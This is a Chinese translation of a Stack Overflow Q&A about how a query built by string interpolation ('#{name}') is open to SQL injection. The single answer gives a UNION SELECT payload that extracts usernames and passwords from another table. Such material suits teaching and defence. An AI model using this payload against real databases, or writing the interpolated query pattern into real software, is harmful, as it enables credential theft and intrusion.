文章/答案/技术大牛

发布

社区首页 >问答首页 >Sql注入漏洞检查

问Sql注入漏洞检查
EN

Stack Overflow用户

提问于 2018-10-04 19:49:46

回答 1查看 45关注 0票数 0

只是出于好奇：

我知道，出于SQL注入的考虑，不应该将值传递给查询。

我有一个类似于下面的查询。如何将其用于SQL注入？

select * from users u inner join departments d on u.id = d.user_id
where u.id = '#{name}'

所以所做的查询是

 select * from users u inner join departments d on u.id = d.user_id
    where u.id = 'An'

该查询只是一个示例，而不是一个有效的查询。

发布于 2018-10-04 19:59:58

对name使用以下内容

' UNION SELECT username, password /* more fields */ FROM secrettable WHERE '' = '

票数 3

页面原文内容由Stack Overflow提供。腾讯云小微IT领域专用引擎提供翻译支持

原文链接：

https://stackoverflow.com/questions/52645954

复制

相似问题

问Sql注入漏洞检查EN